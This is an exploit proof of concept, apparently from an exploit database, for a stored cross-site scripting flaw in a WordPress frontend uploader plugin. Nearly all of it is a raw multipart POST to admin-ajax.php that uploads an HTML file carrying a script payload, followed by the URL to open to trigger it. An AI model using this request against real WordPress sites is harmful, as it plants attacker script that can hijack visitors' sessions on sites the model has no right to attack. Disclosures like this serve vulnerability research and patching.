Share
## https://sploitus.com/exploit?id=WPEX-ID:E53EF41E-A176-4D00-916A-3A03835370F1
In a page/posts where the [fu-upload-form] shortcode is embed, simply upload an HTML file via the generated form
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------124662954015823207281179831654
Content-Length: 1396
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="post_ID"
1247
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="post_title"
test
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="post_content"
test
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="files[]"; filename="xss.html"
Content-Type: text/html
<script>alert(/XSS/)</script>
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="action"
upload_ugc
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="form_layout"
image
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="fu_nonce"
021fb612f9
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="_wp_http_referer"
/wordpress/frontend-uploader-form/
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="ff"
92b6cbfa6120e13ff1654e28cef2a271
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="form_post_id"
1247
-----------------------------124662954015823207281179831654--
Then access the uploaded to trigger the XSS, ie https://example.com/wp-content/uploads/2021/07/xss.html